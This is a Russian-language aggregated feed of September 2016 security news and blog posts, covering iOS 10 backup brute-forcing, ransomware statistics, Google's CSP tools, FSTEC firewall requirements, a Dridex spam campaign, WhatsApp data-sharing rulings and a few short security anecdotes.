Apple недавно признали проблему защищенности шифрования при резервном копировании iOS 10, позволяющую проводить атаку брутфорс (Brute Force Attack), подбирая 6 000 000 паролей в секунду.

Выпущенная в середине сентября iOS 10 исправила в общей сложности 7 уязвимостей, наиболее серьезная из которых может привести к атаке посредника (man-in-the-middle attack). Поскольку iOS 10 имела ошибку, превращающую смартфоны в кирпич, Apple поспешили выпустить iOS 10.0.1, которая также включает исправление обнаруженной в прошлом месяце уязвимости.

Брешь в безопасности локальных резервных копий в iOS 10 была обнаружена ElcomSoft, компанией, специализирующейся на инструментах восстановления пароля. По их мнению, в iOS 10 локальные резервные копии гораздо больше подвержены атаке брутфорс, чем в предыдущих версиях.

По словам ElcomSoft, они смогли восстановить пароли из резервных копий iOS 10 со скоростью в несколько тысяч раз быстрее по сравнению с прошлыми версиями прошивки. Похоже на то, что причиной подобного является введенные в iOS 10 автономные (iTunes) резервные копии.

Эксперт ElcomSoft Олег Афонин объясняет в своем блоге, что в прошивке iOS 10 реализован новый механизм проверки пароля в резервных копиях. Это позволяет злоумышленникам подбирать пароли в 2500 раз быстрее, чем в прошлых версиях. Афонин утверждает, что эксперимент был проведен на компьютере под управлением процессора Intel i5.

ElcomSoft на данный момент не предоставили никаких конкретных деталей относительно этой уязвимости, хотя упомянули, что соответствующий эксплоит был добавлен в Elcomsoft Phone Breaker 6.10. Компания также утверждает, что на том же компьютере, но с прошивкой iOS 9, удается подбирать пароли с периодичностью 2 400 паролей в секунду. В случае с iOS 10, эта цифра 6000000 паролей в секунду.

Только защищенные паролем локальные резервные копии, полученные с помощью устройств на iOS 10 позволяют злоумышленнику использовать этот новый вектор для атак. Афонин отмечает, что старый механизм защиты также доступен в iOS 10 и обеспечивает тот же уровень защиты, что и для предыдущих версий платформы.

«Все версии ОС до 10 имели очень надежную защиту. Теперь же мы можем сломать защиту паролем гораздо быстрее» - говорит Владимир Каталов, генеральный директор компании ElcomSoft.

Apple уже подтвердили наличие этой проблемы и обещают выпустить патч в следующем обновлении ОС. Компания подчеркнула, что данная брешь в безопасности не распространяется на резервные копии ICloud.

orig: 2016-09-28 10:23:16 / https://www.anti-malware.ru/news/2016-09-28/21072 (click post title)

Компания SearchInform провела исследование и выяснила, что с 2014 по 2016 год число попыток слива информации сотрудниками российских компаний выросло на 17,3%. Для этого эксперты аналитического центра проанализировали данные 500 клиентов SearchInform за указанный период.

Исследователи определили, что 31,4% – это умышленная кража информации (в том числе сохранение информации на личном носителе «на всякий случай» или ввиду смены работы), 17,9% – случайные сливы данных или результат деятельности социальных инженеров. 50,7% – это инциденты, мотивы которых однозначно установить не удалось.

«То, что в кризис количество инсайдеров растет, для экспертов в области ИБ не новость, – комментирует председатель совета директоров Группы компаний «СёрчИнформ» Лев Матвеев. – Мотивы у сотрудников могут быть совершенно различные: подкуп со стороны конкурентов или заинтересованных лиц, шантаж со стороны тех же лиц, личная выгода – данные воруются с целью последующей продажи. Зачастую инсайдерами становятся добросовестные сотрудники из-за незнания основных правил ИБ».

Согласно исследованию SearchInform по итогам 2015 года, чаще всего информацию крадут менеджеры (в том числе и руководители подразделений), IT-специалисты и бухгалтеры (в том числе экономисты и финансисты).

orig: 2016-09-28 09:41:53 / https://www.anti-malware.ru/news/2016-09-28/21068 (click post title)

Согласно отчету Check Point в августе 2016 года заметно росло количество вариаций вредоносного ПО для вымогательства и объем атак в целом.  Компания выделила наиболее активные виды вредоносного ПО за этот период.

В августе число видов активного вымогательского ПО выросло на 12%, в то время как число обнаруженных попыток атак с использованием ransomware выросло на 30%. Две трети всех обнаруженных кибервымогателей поднялись в рейтинге,  большинство из них более чем на 100 позиций. Специалисты Check Point считают, что рост числа вымогательского ПО — следствие относительной легкости внедрения, а также того, что некоторые компании просто платят мошенникам, чтобы получить критические данные. В результате, такие атаки становятся прибыльным и привлекательным направлением для киберпреступников.

Количество атак на компании в России в августе 2016 года не изменилось с прошлого месяца — в  рейтинге наиболее атакуемых стран Threat Index наша страна занимает 50-е место. В топ-10 вредоносных семейств, атаковавших российские сети, вошли Kometaur, Conficker, InstalleRex, Ramnit, Zeus, Locky,Cryptowall, Sality, Dorkbot, Angler ek.

Check Point обнаружил, что число уникальных и активных семейств вредоносного ПО осталось таким же, как и в прошлом месяце, однако их использование в атаках остается неизменно высоким. В целом, Conficker был самым активным — на него пришлось 14% всех распознанных атак; второе место занимает JBossjmx — 9%; Sality также отвечает за 9%. На топ-10 самых популярных семейств пришлось 57% всех зарегистрированных атак.

Sality — Вирус, который заражает ОС Microsoft Windows и позволяет удаленные действия и загрузки других вредоносных программ. Из-за своей сложности и способностей к адаптации Sality считается на сегодняшний день одной из самых опасных вредоносных программ

Семейства мобильных вредоносных программ по-прежнему представляют серьезную угрозу для корпоративных мобильных устройств. В течение пяти месяцев HummingBad оставался самым распространенным мобильным зловредом, однако число обнаруженных инцидентов сократилось более чем на 50%.

Самыми активными в августе были:

HummingBad —вредоносное ПО для Android, которое, используя устойчивый к перезагрузке руткит, устанавливает мошеннические приложения и с небольшими модификациями может проявлять дополнительную вредоносную активности, включая установку ключей-регистраторов, кражу учетных данных и обход зашифрованных email-контейнеров, используемых компаниями.

Василий Дягилев, глава представительства Check Point Software Technologies в России и СНГ, прокомментировал: «Компании сталкиваются со множеством трудностей, когда речь идет о борьбе с вымогательским ПО. Если они не заплатят, то рискуют потерять критические данные и ценные активы. Если они заплатят, то спровоцируют рост интереса киберпреступников к такому ПО как к привлекательному способу атак. Чтобы свести на нет эту проблему, организациям требуются дополнительные меры по предотвращению угроз в сетях, на конечных и мобильных устройствах. Решением могут стать  SandBlast™ Zero-Day Protection  и Mobile Threat Prevention от Check Point».

orig: 2016-09-28 09:28:32 / https://www.anti-malware.ru/news/2016-09-28/21067 (click post title)

Google выпустили новые инструменты и документацию к ним, чтобы помочь разработчикам снизить риск атак XSS с помощью стандарта Content Security Policy (CSP).

XSS-уязвимости продолжают затрагивать многие веб-приложения, даже те, которые разработаны крупными компаниями. За последние два года Google выплатила экспертам 1,2 млн. долларов за обнаружение этих уязвимостей.

Одним из эффективных способов снижения риска XSS является CSP – механизм, позволяющий разработчикам ограничить выполнение определенных сценариев. Если политики настроены должным образом, злоумышленники не смогут загружать вредоносные скрипты, даже если им удастся внедрить HTML код в веб-страницу.

Однако CSP не способен полностью исключить риск XSS, даже если все настроено должным образом. Исследование, проведенное недавно экспертами Google, более чем на 1 млрд. доменов, показали, что политики CSP можно обойти в подавляющем большинстве случаев.

Google хочет помочь разработчикам, для этого они выпустили инструмент CSP Evaluator. Он помогает определить, насколько правильно сконфигурированы политики CSP. CSP Evaluator также существует в виде расширения для Chrome.

Несмотря на то, что такой инструмент может быть очень полезным, Google отметили, что на данный момент сложно создать белый список безопасных скриптов для сложных приложений.

Google сами использовали такой подход в некоторых своих приложениях, например: Cloud Console, History, Photos, Maps Timeline, Careers Search и Cultural Institute. Компания также выпустили другое расширение для Chrome - CSP Mitigator. Также доступна документация с описанием наиболее эффективных стратегий для реализации CSP. 

Кроме того, Google привлекли экспертов по вопросам безопасности над дальнейшими исследованиями в области защиты от XSS-атак.

orig: 2016-09-28 09:03:54 / https://www.anti-malware.ru/news/2016-09-28/21066 (click post title)

Я уже как-то упоминала (см. http://rusrim.blogspot.ru/2015/06/blog-post_0.html ) о подготовке во Франции закона о свободе творчества, архитектуре и культурно-историческом наследии (loi relatif à la liberté de création, à l'architecture et au patrimoine, LCAP).

Нужно отметить, что лоббирование французского архивно-документоведческого сообщество принесло свои плоды, и в окончательный текст этого закона, принятый 7 июля 2016 года (LOI n° 2016-925 du 7 juillet 2016, https://www.legifrance.gouv.fr/affichTexte.do?cidTexte=JORFTEXT000032854341&categorieLien=id ), был внесен ряд нужных специалистам по управлению документами и отсутствовавших в первоначальном проекте закона LCAP статей, вносящих поправки в основной для этой отрасли правовой документ – «Кодекс культурно-исторического наследия» (Code du patrimoine, https://www.legifrance.gouv.fr/affichCode.do?cidTexte=LEGITEXT000006074236&dateTexte=20160916 ).

Среди прочего, изменено определения понятия «документы» (les archives), установленная статьей L.211-1 «Кодекса культурно-исторического наследия»:

Было: (см. https://www.legifrance.gouv.fr... ):
Документами (les archives) являются все материалы (des documents), вне зависимости от времени их создания, места хранения, формы и носителя, созданные или полученные любым физическим или юридическим лицом и любым государственным или частным учреждением или службой в ходе осуществления ими свой деятельности.Стало: (см. https://www.legifrance.gouv.fr... ):
Les archives sont l'ensemble des documents, y compris les données, quels que soient leur date, leur lieu de conservation, leur forme et leur support, produits ou reçus par toute personne physique ou morale et par tout service ou organisme public ou privé dans l'exercice de leur activité.

Документами (les archives) являются все материалы (des documents), в том числе данные, вне зависимости от времени их создания, места хранения, формы и носителя, созданные или полученные любым физическим или юридическим лицом и любым государственным или частным учреждением или службой в ходе осуществления ими свой деятельности.Поправка маленькая, но какая весомая!

Также изменилась трактовка понятия «государственные (публичные) документы» (les archives publiques), которая дана в статье L.211-4:

Было: (см. https://www.legifrance.gouv.fr... ):
Публичными документами являются:

а) Материалы, образующиеся в деятельности, в рамках выполнения своей миссии публичной службы, - государства, местных органов власти, государственных учреждений и других юридических лиц публичного права или лиц частного права, ответственных за такую миссию. Акты и документы парламентских собраний регулируются постановлением № 58-1100 от 17 ноября 1958 года о функционировании парламентских собраний;

b) (Удалена);

c) Протоколы и реестры публичных должностных лиц и должностных лиц министерств.Стало: (см. https://www.legifrance.gouv.fr... ):
Публичными документами являются:

1. Материалы, образующиеся в деятельности государства, местных органов власти, государственных учреждений и других юридических лица публичного права. Акты и документы парламентских собраний регулируются постановлением № 58-1100 от 17 ноября 1958 года о функционировании парламентских собраний;

2. Материалы, образующиеся при управлении публичной службой или при осуществлении миссии публичной службы лицами частного права;

3. Протоколы и реестры публичных должностных лиц и должностных лиц министерств, и регистры нотариально заверенных соглашений о заключении гражданского брака.Источник: Французский правовой порта LegiFrance
https://www.legifrance.gouv.fr/affichTexte.do?cidTexte=JORFTEXT000032854341&categorieLien=id
https://www.legifrance.gouv.fr/affichCode.do?cidTexte=LEGITEXT000006074236&dateTexte=20160916

orig: 2016-09-28 08:00:21 / http://rusrim.blogspot.com/2016/09/blog-post_28.html (click post title)

The final 11.0-RELEASE is going to be rebuilt in order to address a few last-minute items that were discovered after the release tag. Please see the official announcement from the Release Engineering team for more information.

orig: 2016-09-28 08:00:00 / http://www.FreeBSD.org/news/newsflash.html#event20160928:01 (click post title)

http://www.pcweek.ru/themes/detail.php?ID=188827

После работы Иоганн любил, приехав домой, повозиться с собакой, а потом устроившись в кресле у камина посидеть с чашкой ароматного чаю с корицей и гвоздикой, добавив в него чайную ложку хорошего коньяка. Это всегда удивляло его друзей, ведь привычным сочетанием они всегда считали кофе с коньяком, а тут вдруг чай… Но Иоганн всегда отличался оригинальностью и считал, что именно этот напиток помогает ему согреться побыстрее, да и кофе на ночь он считал излишним.

В тот вечер все шло как обычно. Но вдруг раздался звонок в дверь. Причем, собака не стала лаять. Иоганн понял, что пришел кто-то из немногочисленных друзей. Так и случилось.

— Иоганн, пустишь в гости?

— Конечно, а что случилось?

— Да случилось! Ты ж знаешь, что я построил себе «умный» дом. Практически все в нем управлялось через контроллер от фирмы N.

— Да, я помню. Клаус, ты же хвастался этим всегда. И радовался, что все управлялось с твоего смартфона через облако. И даже, кажется, можно было подключать к нему любые «умные» устройства?

— Ага, радовался. Да вот только именно это и стало причиной моей нынешней беды. Со вчерашнего дня компания N, купленная недавно компанией G, прекратила поддержку своих центров управления, и они стали бесполезным куском железа.

— Но это же надувательство!

— Не, мне вернули мои 300 имперских реалов полностью, но ведь теперь мне перестраивать все под новый центр, а это будет стоить и времени, и денег, а пока в моем доме просто нельзя жить. Ни отопление включить, ни свет зажечь…

— А чем обусловлено отключение?

— Да все просто. У компании G есть свой аналогичный проект. Пусть не такой хороший и явно дороже, но свой. И содержать два проекта параллельно они посчитали излишним. А мы расплачиваемся.

— Да-а-а. А как с безопасностью у нового центра?

— Да не знаю пока. И никто не знает. Ведь его никто пока не видел. Короче, «умный» дом — это здорово, но боюсь пока не появится стандарт на оборудование, я больше не игрок в такие игры.

А вы задумывались что ваши «умные» устройства в один день могут просто превратиться в кирпич? И что тогда? Вы готовы к такому повороту?

Нравится Загрузка...

Итак, произошло долгожданное событие и ФСТЭК РФ в дополнение к ранее выпущенным Профилям антивирусной защиты выпустил (точнее выложил на сайте) и требования к межсетевым экранам. В том числе программным для установки на рабочие станции. К сожалению выложены не все документы — традиционно выложены Профили четвертого, пятого и шестого класса защиты. Остальные классы защиты описываются в документах с грифом ДСП и широкой публике недоступны.

Что же должны уметь межсетевые экраны по мнению ФСТЭК?

Согласно Информационному сообщению «Об утверждении методических документов, содержащих профили защиты межсетевых экранов» от 12 сентября 2016 г. N 240/24/4278 разработаны Профили защиты типов:

• межсетевой экран уровня сети (тип «А») – межсетевой экран, применяемый на физической границе (периметре) информационной системы или между физическими границами сегментов информационной системы. Межсетевые экраны типа «А» могут иметь только программно-техническое исполнение;
• межсетевой экран уровня логических границ сети (тип «Б») – межсетевой экран, применяемый на логической границе (периметре) информационной системы или между логическими границами сегментов информационной системы. Межсетевые экраны типа «Б» могут иметь программное или программно-техническое исполнение;
• межсетевой экран уровня узла (тип «В») – межсетевой экран, применяемый на узле (хосте) информационной системы. Межсетевые экраны типа «В» могут иметь только программное исполнение и устанавливаются на мобильных или стационарных технических средствах конкретного узла информационной системы;
• межсетевой экран уровня веб-сервера (тип «Г») – межсетевой экран, применяемый на сервере, обслуживающем сайты, веб-службы и веб-приложения, или на физической границе сегмента таких серверов сервера). Межсетевые экраны типа «Г» могут иметь программное или программно-техническое исполнение и должны обеспечивать контроль и фильтрацию информационных потоков по протоколу передачи гипертекста, проходящих к веб-серверу и от веб-сервера;
• межсетевой экран уровня промышленной сети (тип «Д») – межсетевой экран, применяемый в автоматизированной системе управления технологическими или производственными процессами. Межсетевые экраны типа «Д» могут иметь программное или программно-техническое исполнение и должны обеспечивать контроль и фильтрацию промышленных протоколов передачи данных (Modbus, Profibus, CAN, HART, Industrial Ethernet и (или) иные протоколы).

Прежде всего об уровнях защищенности. Согласно Информационному сообщению «Об утверждении Требований к межсетевым экранам» от 28 апреля 2016 г. No 240/24/1986

Межсетевые экраны, соответствующие 5 классу защиты, применяются в государственных информационных системах 2 класса защищенности*, в автоматизированных системах управления производственными и технологическими процессами 2 класса защищенности***, в информационных системах персональных данных при необходимости обеспечения 2 уровня защищенности персональных данных**

Межсетевые экраны, соответствующие 4 классу защиты, применяются в государственных информационных системах 1 класса защищенности*, в авто матизированных системах управления производственными и технологическими процессами 1 класса защищенности**, в информационных системах персональных данных при необходимости обеспечения 1 уровня защищенности персональных данных***, в информационных системах общего пользования II класса****.

Межсетевые экраны, соответствующие 3, 2 и 1 классам защиты, применяются в информационных системах, в которых обрабатывается информация, содержащая сведения, составляющие государственную тайну.

* Устанавливается в соответствии с Требованиями о защите информации, не составляющей государственную тайну, содержащейся в государственных информационных системах, утвержденными приказом ФСТЭК России от 11 февраля 2013 г. No17.

** Устанавливается в соответствии с Требованиями к обеспечению защиты информации в автоматизированных системах управления производственными и технологическими процессами на критически важных объектах, потенциально опасных объектах, а также объектах, представляющих повышенную опасность для жизни и здоровья людей и для окружающей природной среды, утвержденными приказом ФСТЭК России от 14 марта 2014 г. No 31.

*** Устанавливается в соответствии Требованиями к защите персональных данных при их обработке в информационных системах персональных данных, утвержденными постановлением Правительства Российской Федерации от 1 ноября 2012г., No 1119.

**** Устанавливается в соответствии с Требованиями о защите информации, содержащейся в информационных системах общего пользования, утвержденными приказом ФСБ России и ФСТЭК России от 31августа 2010 г. No 416/489.

Что есть межсетевой экран согласно Профилю?

• несанкционированный доступ к информации, содержащейся в информационной системе в связи с наличием неконтролируемых сетевых подключений к информационной системе;
• отказ в обслуживании информационной системы и (или) ее отдельных компонентов в связи с наличием неконтролируемых сетевых подключений, уязвимостями сетевых протоколов, недостатками настройки механизмов защиты, уязвимостями в программном обеспечении программно-аппаратных средств ИС. Здесь интересен способ реализации угрозы — «установление не предусмотренных технологией обработки информации в информационной системе сетевых соединений с информационной системой и (или) ее отдельными компонентами для отправки множества сетевых пакетов (запросов) до заполнения ими сетевой полосы пропускания канала передачи данных или отправки специально сформированных аномальных сетевых пакетов (запросов) больших размеров или нестандартной структуры». Получается, что МЭ должен иметь средства защиты от DDoS? Странно, что иных возможностей реализации угрозы установления неразрешенных соединений нет;
• несанкционированная передача информации из информационной системы в информационно-телекоммуникационные сети или иные информационные системы в связи с внедрением вредоносного программного обеспечения для несанкционированной отправки защищаемой информации на средства вычислительной техники нарушителя или отправкой защищаемой информации на средства вычислительной техники нарушителя пользователем информационной системы;
• несанкционированное воздействие на МЭ, целью которого является нарушение его функционирования, включая преодоление или обход его функций безопасности в связи с отправкой специально сформированных сетевых пакетов на интерфейсы МЭ.

• контроль и фильтрация;
• идентификация и аутентификация;
• регистрация событий безопасности (аудит);
• обеспечение бесперебойного функционирования и восстановление;
• тестирование и контроль целостности;
• управление (администрирование);
• взаимодействие с другими средствами защиты информации — сертифицированными на соответствие требованиям безопасности информации по соответствующему классу защиты.

• МЭ должен «осуществлять фильтрацию сетевого трафика для отправителей информации, получателей информации и всех операций перемещения контролируемой МЭ информации к узлам информационной системы и от них». При этом фильтрация должна распространяться «на все операции перемещения через МЭ информации к узлам информационной системы и от них». Если первая часть требований вполне логична, то вторая утопична, так как требует раскрытия файрволом всех протоколов и любых недокументированных возможностей перемещения информации (например передачи информации вредоносными программами через DNS).

  Интересно, что в разделе FW_ARP_EXT.2 уточняется, что МЭ должен иметь возможность по блокированию неразрешенного информационного потока по протоколу передачи гипертекста — о иных протоколах нет указаний. Должен ли МЭ блокировать передачу информации по ним? Кстати вполне возможно, что данный пункт попал в документ из Профиля типа Г — там достаточно много внимания уделяется именно этому протоколу;

• МЭ должен осуществлять фильтрацию по следующим признакам: сетевой адрес узла отправителя, сетевой адрес узла получателя, сетевой протокол, транспортный протокол, порты источника и получателя в рамках сеанса (сессии), разрешенные (запрещенные) команды, разрешенный (запрещенный) мобильный код, разрешенные (запрещенные) протоколы прикладного уровня. МЭ также должен иметь возможность «осуществлять политику фильтрации пакетов с учетом управляющих команд от взаимодействующих с МЭ средств защиты информации других видов». Также МЭ должен иметь возможность определять ПО, осуществляющее соединения и назначать для него разрешительные и (или) запретительные атрибуты безопасности с целью последующего осуществления фильтрации;
• МЭ должен иметь «возможность осуществлять проверку каждого пакета по таблице состояний для определения того, не противоречит ли состояние (статус, тип) пакета ожидаемому состоянию»;
• МЭ должен иметь «возможность осуществлять проверку использования сетевых ресурсов, содержащих мобильный код, для которого администратором МЭ установлены разрешительные или запретительные атрибуты безопасности». Означает ли это, что МЭ должен иметь возможность удаленной проверки сетевых ресурсов ", содержащих отдельные типы мобильного кода "? Странное требование, применимое больше к антивирусам. Скорее всего это должна выть отдельная операция, производимая по запросу. По результатам проверки МЭ должен иметь возможность разрешать и запрещать доступ к таким ресурсам;
• МЭ должен иметь «возможность разрешать/запрещать информационный поток, основываясь на результатах проверок». Не уточняется, на основании каких проверок должен запрещаться или разрешаться информационный поток. Логично было бы, если бы запреты или разрешения были на уровне предопределенных правил;
• МЭ должен иметь как возможность регистрации и учета выполнения проверок информации сетевого трафика, так и возможность чтения таких записей — в том числе с возможностью использования поиска и фильтрации. В соответствии с Профилем должны регистрироваться события ", которые в соответствии с национальным стандартом Российской Федерации ГОСТ Р ИСО/МЭК 15408-2-2013 «Информационная технология. Методы и средства обеспечения безопасности. Критерии оценки безопасности информационных технологий. Часть 2. Функциональные компоненты безопасности» включены в базовый уровень аудита";
• МЭ должен поддерживать роли администраторов и возможность идентификации и аутентификации администратора для выполнения разрешенных данному администратору действий;
• МЭ должен иметь возможность создания и назначения различных профилей (настроек);
• МЭ должен иметь возможность ведения таблицы состояний каждого соединения с указанием его статуса;
• МЭ должен иметь «возможность обеспечения перехода в режим аварийной поддержки, который предоставляет возможность возврата МЭ к штатному режиму функционирования» и «возможность тестирования (самотестирования) функций безопасности МЭ (контроль целостности исполняемого кода МЭ)»;
• МЭ должен иметь «возможность осуществлять выдачу предупреждающих сообщений пользователю МЭ», позволяющих возможность «осуществить блокирование доступа к средству вычислительной техники».

В профиле указывается, что функциональные требования безопасности для МЭ составлены на основе требований ГОСТ Р ИСО/МЭК 15408-2-2013 «Информационная технология. Методы и средства обеспечения безопасности. Критерии оценки безопасности информационных технологий. Часть 2. Функциональные компоненты безопасности» и достаточно сильно напоминают требования Профилей антивирусной защиты.

К сожалению в открытую часть не попали схемы, указывающие, где должен располагаться сертифицированный МЭ типа В. Но даже из списка функционала видно, что защита домашних машин пользователей, мобильных пользователей, а также защита мобильных устройств ФСТЭК'ом на данный момент не рассматривается.

В связи с тем, что МЭ, предназначенные для защиты рабочих станций и попадающие под тип В часто имеют функционал защиты от вторжений, интересно иметь требования и к этому функционалу. В рассмотренных Профилях таких требований нет, но они есть в Методическом документе ФСТЭК «Меры защиты информации в государственных информационных системах». Согласно данному документу МЭ:

• антивирусная защита и защита от спама должны применяться на средствах межсетевого экранирования (требования АВЗ.1 и ОЦЛ.4)
• в информационной системе должна осуществляться кластеризация средств защиты информации (в случаях, когда это технически возможно), включая средства межсетевого экранирования
• обнаружение (предотвращение) вторжений должно осуществляться на внешней границе информационной системы (системы обнаружения вторжений уровня сети) и (или) на внутренних узлах (системы обнаружения вторжений уровня узла) сегментов информационной системы (автоматизированных рабочих местах, серверах и иных узлах), определяемых оператором

Итого, что мы имеем? На первый взгляд базовая функциональность персонального файрвола описана. Но:

• несмотря на то, что данный тип МЭ должен применяться в составе информационной системы — требований по централизованному управлению нет. Требуется только обеспечить доверенный канал управления в составе среды функционирования. Напомним, что в профилях антивирусных решений есть отдельные профили для централизованно управляемых решений и для отдельно стоящих;
• Несмотря на требование по фильтрации соединений от конкретных приложений — нет требований по наличию баз профилей приложений. Без таких баз правил администратору придется настраивать каждое новое соединение. Не есть хорошо и удобно;
• Нет требований по режимам работы — все запрещено/разрешено/режим обучения. Предполагается настраивать каждое соединение по одному?;
• Нет списка контролируемых протоколов. Упоминается только один — HTTP. Скажем как контролировать соединения по разрешенным протоколам (типа DNS), нужно ли фильтровать соединения, инкапсулирующиеся в разрешенные протоколы — вопросов много;
  
  источник картинки
• Нет требований по функционалу защиты от сетевых атак. Естественно ожидать внутри сети DDoS не стоит, но уведомления от скажем перебора портов вещь не слишком ненужная. По сути сейчас большинство персональных файрволов имеют такой функционал. Вопрос не праздный. За любую сертификацию берут деньги — и достаточно большие. Но об этом чуть ниже;
• Несмотря на требование наличия процедур обновления — в функционале нет требований по наличию функций обновлений. Не будем говорить об уязвимостях, но те же вредоносные программы не стоят на месте и список используемых ими протоколов изменяется;
• Совершенно непонятное требование по взаимодействию с иными средствами защиты. Единого протокола для средств защиты нет — хотя производители тех же SIEM от него не отказались бы. Возможно это требование под конкретный продукт? Возможно это требование под МЭ с антивирусным плагином. Но такие продукты не составляют большинство на рынке. Как правило дело обстоит наоборот — для защиты станций ставятся антивирусы с модулем файрвола;
• Сообщения должны отправляться пользователям. Зачем они им в корпоративной сети? Обычно такие уведомления идут администраторам, а для пользователей скрываются. Нет требований по типам уведомлений администраторам — или они должны по мнению ФСТЭК круглосуточно сидеть за мониторами рабочих станций, ожидая уведомлений?

И тут потребителей ожидает засада. До выхода Профилей для защиты рабочих станций можно было использовать сертифицированный антивирус, в составе которого шел файрвол — как компонент антивируса тоже сертифицированный. Теперь так нельзя. Получается или производителям антивируса платить еще одну стоимость сертификации (и отбивать ее конечно) — а дальнейшем возможно и еще одну за СОВ или пользователям покупать три отдельных продукта — и тем самым требовать от руководства увеличения бюджета. Возможности для производителей антивирусов расширить сертификат не предусмотрено, а значит вариантов не так много:

• закладывать в бюджет средства и на сертифицированный антивирус и на сертифицированный МЭ;
• продлить ранее купленный сертифицированный антивирус на много лет вперед, так как ранее закупленные МЭ могут продолжать использоваться;
• надеяться, что ФСТЭК одумается.

До 1 декабря осталось немного, интересно, кто успеет провести сертификацию

orig: 2016-09-28 07:36:58 / https://habrahabr.ru/post/311188/ (click post title)

http://www.pcweek.ru/themes/detail.php?ID=188825

В тот вечер принц с коллегами праздновал очередную годовщину создания своего управления. Вечер плавно перешел в воспоминания. Молчавший всегда на таких мероприятиях Майк попросил слово. Все очень удивились, потому как из него-то уж точно слово не выжмешь. А он решил поведать свою историю, когда потерпевший по собственной глупости и жадности стал подсудимым.

Дело было в одном из небольших портовых городов. Майк тогда работал в местном отделении полиции обычным агентом, но так как до этого он закончил университет по ИТ-специальности, то и занимался он в первую очередь всем, что так или иначе относилось к ИТ.

К ним обратились представители небольшой компании, со счета которой взломщики попытались перевести крупную сумму денег. Но то ли взломщики были неопытными, то ли что-то пошло не так, но платеж был остановлен на уровне банка его службой безопасности.

В ходе проведенного расследования выяснилось, что злоумышленники взломали компьютерную сеть предприятия, похитили ключи клиент-банка и попытались провести платеж.

— А почему не смогли?

— Да потому что СБ банка обратила внимание на нехарактерно крупную сумму и на то, что платеж уходит с незнакомого IP-адреса.

— А как сумели похитить банковские ключи?

— Да эти, простите, ваше высочество, других слов нет, только нецензурные, хранили ключи на жестком диске.

— Согласен, идиоты!

— Майк, а как их взломали?

— Да все просто. Их владелец решил сэкономить и воспользовался пиратским ПО, троян уже был в инсталляционном пакете. Мало того, как мы сумели установить, в компании практически не было легально купленного ПО, антивирус и тот был бесплатным. Как же визжал владелец компании, когда по результатам обследования компьютерной сети мы передали дело в суд о нарушении авторских прав. Сумма штрафа при этом оказалась даже больше чем та, которую хотели украсть злоумышленники.

— А как реагировал их администратор?

— Он просто показал нам копии своих докладных директору о том, что нужно покупать ПО, а не ставить полученное их незаконных источников. Его оправдали.

— Н-да, действительно, потерпевший стал подсудимым. Такого мы еще не видели.

— Ну а я после этого попросился на службу к вам. Все равно мне бы не было житья на старом месте. Владелец оказался каким-то родственником начальника полиции.

— Хорошо, что все хорошо закончилось.

Я надеюсь у вас-то все в порядке, а то мало ли…

Нравится Загрузка...

Wednesday, September 28, 2016 (07:27:19)

Reviewed by K. Gus Dimitrelos CEO – Cyber Forensics 360

Opening the Oxygen Forensic Detective Dongle packaging I did not expect my forensics world of 20 years and counting to change so quickly. As a retired Secret Service agent, I began forensics in the dark ages of 1996 and would never have forecasted the growth of the mobile device market or their involvement or use in criminal enterprise. The importance of connecting device extracted data, event timelines, and linked communications with the associated web, social and cloud artifacts has re-defined the role of examiners and detectives. Welcome to the future and the new baseline of mobile device and data forensics. Oxygen Forensic Detective moved the line across from the typical data-dump style result to a more analytical and fully functioning Swiss cyber knife.

Read More

• Posted by: scar
• Topic: News

• Printer Friendly Page
• Send to a Friend

orig: 2016-09-28 07:27:19 / http://www.forensicfocus.com/News/article/sid=2742/ (click post title)

Германия не разрешает передачу Facebook данных WhatsApp

https://www.pcweek.ru/security/blog/security/8963.php

В прошлом месяце наиболее популярный мессенджер WhatsApp обновил свою политику конфиденциальности, чтобы начать совместное использование данных своих пользователей с Facebook, и сегодня многие компании, и пользователи оказались в неприятном положении.
В Гамбурге (Германия) комиссар ведомства по защите данных и свободы информации (Hamburg Commissioner for Data Protection and Freedom of Information) Йоханнс Каспар (Johannes Caspar) постановил, чтобы Facebook удалил все данные, которые переданы WhatsApp с августа. Это приблизительно 35 миллионов учетных записей пользователей WhatsApp в Германии.
В Индии Верховный суд Дели 23 сентября постановил, что WhatsApp должен удалить данные всех пользователей со своих серверов вплоть до 25 сентября 2016 года, когда вступила в действие новая политика конфиденциальности компании.
Когда Facebook приобрел WhatsApp за 19 миллиардов долларов США в 2014 году, WhatsApp обещал, что данные его пользователей не будут использоваться Facebook.
Но сегодня положение изменилось и это, по словам Каспара не только вводит в заблуждение пользователей, но и приводит к нарушению немецкого законодательства о защите данных.

This entry was posted on 28.09.2016 at 09:14 and is filed under Компьютеры и Интернет, Мысли вслух, Персональные данные, Социальные сети, Статьи, IT-Security. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Вместо ботнета Necurs злоумышленники используют для доставки трояна скомпрометированные серверы.  

По данным независимого исследователя безопасности MalwareTech, операторы банковского трояна Dridex экспериментируют с новыми техниками распространения вредоноса. Эксперт зафиксировал волну спама, источником которого являлись легитимные, но скомпрометированные злоумышленниками web-сайты.

В данной кампании киберпреступники применяли два новых способа доставки Dridex. Если раньше троян распространялся с помощью ботнета из взломанных компьютеров Necurs, то теперь для рассылки спама злоумышленники используют скомпрометированные серверы. Переход на новую технику распространения Dridex отнимет у ИБ-экспертов некоторое время на обнаружение кампании и соответствующую маркировку спама.

Вторая техника – непосредственно спам-письма. Вредоносные сообщения содержат зашифрованный документ в формате rtf и ключ для дешифровки. Благодаря шифрованию спам эффективно обходит фильтры, так как большинство автоматизированных систем, сканирующих вложения на наличие вредоносного кода, не способны расшифровывать документы.

Когда пользователь с помощью ключа открывает файл, появляется сообщение о необходимости активировать макросы, которые затем загружают Dridex Loader, также отличающийся от используемого в предыдущих кампаниях. Загрузчик запускает интерфейс командной строки и до начала вредоносной активности 250 раз проверяет на доступность один из бесплатных DNS-серверов Google.

orig: 2016-09-28 07:03:56 / http://www.securitylab.ru/news/483958.php (click post title)

Бюро запросило разрешение потенциальных жертв на копирование содержимого телефонов для дальнейшего изучения.

ФБР проводит расследование попыток взлома мобильных телефонов ряда членов Демократической партии США, сообщает информагентство Reuters со ссылкой на осведомленные источники. В рамках расследования, бюро запросило разрешение потенциальных жертв на копирование содержимого телефонов для дальнейшего изучения.

